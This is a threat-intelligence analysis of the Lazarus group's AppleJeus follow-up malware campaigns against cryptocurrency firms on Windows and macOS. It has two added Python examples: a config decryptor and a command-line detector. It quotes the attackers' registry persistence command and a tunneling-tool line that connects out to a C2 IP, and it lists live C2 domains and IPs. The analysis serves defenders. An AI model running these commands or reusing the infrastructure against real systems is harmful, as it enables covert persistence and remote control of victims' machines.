The Lazarus group is one of the most active APT groups today. In 2018, Kaspersky discovered an attack campaign by this group called AppleJeus. This operation was Lazarus's first attack on macOS users. To attack macOS users, Lazarus developed macOS malware with an authentication mechanism that carefully downloads the next-stage payload and loads it without dropping it to disk. To attack Windows users, they developed a multi-stage infection process. After the analysis of the AppleJeus operation was released, Lazarus became more cautious in its attacks, adopting more methods to avoid detection.
AppleJeus follow-up
After the analysis of Operation AppleJeus was published, Lazarus continued to use a similar modus operandi against cryptocurrency businesses, and researchers discovered more macOS malware similar to that found in AppleJeus. This macOS malware uses public code for its installer: it is built on QtBitcoinTrader, developed by Centrabit.
The three macOS installers use similar post-install scripts to drop payloads and the same commands when executing the fetched second-stage payload. In addition, another macOS malware sample, MarkMakingBot.dmg (be37637d8f6c1fbe7f3ffc702afdfe1d), was identified. It was created on 2019-03-12, but its network communication was not encrypted; it is presumably an intermediate stage in the transformation and upgrade of the macOS malware.
Changes in Windows Malware
Continuing tracking of this campaign revealed that a victim was attacked by Windows AppleJeus malware in March 2019. It was determined that the infection started with a malicious file named WFCUpdater.exe, and the attackers used a fake website: wfcwallet[.]com.
The attackers used a multi-stage infection as before, but the method has changed. The infection begins with .NET malware disguised as the WFC wallet updater (a9e960948fdac81579d3b752e49aceda). After execution, this .NET file checks whether the command line parameter is "/Embedding". The malware decrypts the WFC.cfg file located in the same folder using a hardcoded 20-byte XOR key (82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62) and then connects to one of the following C2 servers:
wfcwallet.com (resolved ip: 108.174.195.134)
www.chainfun365.com(resolved ip: 23.254.217.53)
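As an added example (not code from the original article or from the malware author), an analyst-side decryptor for a config blob protected with the repeating 20-byte XOR key quoted above. The sample ciphertext is constructed here from the two C2 host names on the page; the real WFC.cfg contents are not on the page.

```python
from typing import List

# The 20-byte key exactly as quoted in the write-up.
WFC_XOR_KEY = bytes.fromhex("82d7ae9b367dfcee41658ffa74cd2c62b759f562")


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR `data` with `key`, cycling the key every len(key) bytes.
    XOR is symmetric, so the same call both encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_config(blob: bytes, key: bytes = WFC_XOR_KEY) -> str:
    """Decrypt a WFC.cfg-style blob and return it as text.
    A wrong key yields high-entropy bytes, so the UTF-8 decode doubling
    as a cheap sanity check will usually raise instead of returning junk."""
    return xor_repeating(blob, key).decode("utf-8")


def extract_c2_hosts(config_text: str) -> List[str]:
    """Collect host-name-looking lines (one per line, no spaces) from the
    decrypted text; the real config layout is an assumption."""
    hosts = []
    for line in config_text.splitlines():
        line = line.strip()
        if line and "." in line and " " not in line:
            hosts.append(line)
    return hosts


# Constructed sample: a plaintext listing the two C2 hosts named in the
# article, encrypted with the key above. This is NOT the real WFC.cfg.
SAMPLE_PLAINTEXT = b"wfcwallet.com\nwww.chainfun365.com\n"
SAMPLE_BLOB = xor_repeating(SAMPLE_PLAINTEXT, WFC_XOR_KEY)

if __name__ == "__main__":
    text = decrypt_config(SAMPLE_BLOB)
    print(text)
    print(extract_c2_hosts(text))
```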
The attacker's commands are then executed to install the next stage payload. The attacker places two files in the victim's system folder, rasext.dll and msctfp.dat, and uses the RasMan (Remote Access Connection Manager) Windows service to register the next stage payload. After basic reconnaissance, the attacker manually planted the payload using the following commands:
cmd.exe /c dir rasext.dll
cmd.exe /c dir msctfp.dat
cmd.exe /c tasklist /svc | findstr RasMan
cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\ThirdParty /v DllName /d rasext.dll /f
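As an added example (not code from the original article), a small detection routine that flags the RasMan ThirdParty DLL registration and the reconnaissance commands quoted above, run over constructed process-creation records with a CommandLine field (as a Sysmon Event ID 1 or EDR feed would provide); the rule names and event layout are assumptions.

```python
import re
from typing import Dict, List

# Registry path quoted in the article, matched case-insensitively. The DLL
# name is deliberately left open: a defender should not assume rasext.dll.
RASMAN_THIRDPARTY = re.compile(
    r"reg(\.exe)?\s+add\s+.*\\services\\RasMan\\ThirdParty\b.*/v\s+DllName",
    re.IGNORECASE,
)
RASMAN_RECON = re.compile(r"tasklist\s+/svc.*findstr\s+RasMan", re.IGNORECASE)
DROPPED_FILE_CHECK = re.compile(r"\bdir\s+(rasext\.dll|msctfp\.dat)\b", re.IGNORECASE)


def classify(cmdline: str) -> List[str]:
    """Return the names of the rules a command line triggers (may be empty)."""
    hits = []
    if RASMAN_THIRDPARTY.search(cmdline):
        hits.append("rasman_thirdparty_persistence")
    if RASMAN_RECON.search(cmdline):
        hits.append("rasman_service_recon")
    if DROPPED_FILE_CHECK.search(cmdline):
        hits.append("applejeus_dropped_file_check")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every event through classify(); emit one alert per rule hit."""
    alerts = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        for rule in classify(cmd):
            alerts.append({"rule": rule, "host": ev.get("Host", "?"), "cmd": cmd})
    return alerts


# Constructed sample events: the command lines quoted in the article plus two
# benign ones (a normal dir and a read-only reg query) that must not fire.
SAMPLE_EVENTS = [
    {"Host": "ws01", "CommandLine": "cmd.exe /c dir rasext.dll"},
    {"Host": "ws01", "CommandLine": "cmd.exe /c tasklist /svc | findstr RasMan"},
    {"Host": "ws01", "CommandLine": r"cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\ThirdParty /v DllName /d rasext.dll /f"},
    {"Host": "ws02", "CommandLine": r"cmd.exe /c dir C:\Users\alice\Documents"},
    {"Host": "ws02", "CommandLine": r"reg query HKLM\SYSTEM\CurrentControlSet\services\RasMan"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["host"], alert["rule"], alert["cmd"])
```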
To establish a remote tunnel, the attacker used command line parameters to deploy further related tools, but the researchers did not obtain these tool files.
Port opener:
%APPDATA%\Lenovo\devicecenter\Device.exe 6378
Tunneling tool:
%APPDATA%\Lenovo\devicecenter\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443
macOS Malware Changes
JMTTrading
While tracking this campaign, a macOS malware variant was discovered. The attackers call their fake website and app JMTTrading, and other researchers and security vendors have already released extensive technical details, so only what is different about this attack is highlighted here.
Attackers use GitHub to host their malicious applications.
The malware author used Objective-C instead of the QT framework in his macOS malware.
This malware implements a simple backdoor function in the macOS executable file.
Similar to the previous case, the malware uses a 16-byte XOR key to encrypt/decrypt.
The Windows version of the malware uses ADVobfuscator to hide its code.
The installation script of the macOS malware differs significantly from previous versions.
UnionCryptoTrader
Another attack targeting macOS has also been identified. The malicious program is called UnionCryptoTrader, and security researcher dineshdina04 discovered an identical case. The attack is summarized as follows:
The installation script is the same as the one used by JMTTrading.
The malware author developed this macOS malware using SWIFT.
The malware author changed the method of gathering information.
The malware authenticates to the server using the auth_signature and auth_timestamp parameters before the second stage payload is delivered.
The malware loads the next stage payload without dropping it to disk.
Windows version of UnionCryptoTrader
Researchers found the Windows version of UnionCryptoTrader (0f03ec3487578cef2398b5b732631fec). It is downloaded from Telegram Messenger and executed:
C:\Users\[user name]\Downloads\Telegram Desktop\UnionCryptoTraderSetup.exe
The attacker's Telegram contact was also found on the fake website, so it is strongly believed that the attacker used Telegram Messenger to send the installer. Since the payload only executes in memory, not all relevant files could be retrieved. The entire infection process is very similar to WFCWallet, but an injection step is added.
The Windows version of UnionCryptoTrader displays a window showing price charts for several cryptocurrencies.
The Windows version of the UnionCryptoTrader updater (629b9de3e4b84b4a0aa605a3e9471b31) has similar functionality to the macOS version. Based on the build path (Z:\Loader\x64\Release\WinloaderExe.pdb), the malware author refers to this malware as a loader. Once launched, the malware retrieves the victim's basic information and sends it as an HTTP POST.
If the response from the C2 server is 200, the malware decrypts the payload and loads it into memory. Finally the malware sends act=done. The next stage payload downloaded from this loader (e1953fa319cc11c2f003ad0542bca822) is similar to WFCWallet’s .NET downloader. The malware is responsible for decrypting the Adobe.icx file located in the same folder, injecting the next payload into the Internet Explorer process, and executing the attacker's commands.
The final payload (dd03c6eb62c9bf9adaf831f1d7adcbab) is the same as WFCWallet and was planted manually. Malware authors use previously collected information to plant malware that only works on specific systems. The malware checks the infected system's information and compares it with a given value.
The Windows malware loads the encrypted msctfp.dat file in the system folder and reads each configuration entry. It executes additional commands based on the contents of the file. POST requests with predefined headers are used when the malware communicates with the C2 server.
Initial communication: the malware first sends the following parameters:
cgu: 64-bit hexadecimal value from the configuration
aip: MD5 hash of the configuration
sv: hardcoded value
If the response from the C2 server is 200, the malware sends the next POST request with encrypted data and a random value to the attacker. The attacker uses the random value to identify each victim and to verify POST requests.
imp: randomly generated value
dsh: XOR value of imp
hb_tp: XOR value of imp (key: 0x67BF32)
hb_dl: encrypted data sent to the C2 server
ct: hardcoded value
Finally, the malware downloads and decrypts the next stage payload.
In addition, while investigating its infrastructure, several fake websites were discovered that are still online.
Summary
The AppleJeus follow-up operation had several victims located in the UK, Poland, Russia and China; some of the victims were linked to cryptocurrency businesses.
The attackers altered the macOS and Windows malware, adding an authentication mechanism to the macOS downloader and changing the macOS development framework. The infection process in Windows systems is different from previous ones. The Lazarus group will continue to conduct attacks for financial gain.
The above is the detailed content of How to conduct AppleJeus action analysis. For more information, please follow other related articles on the PHP Chinese website!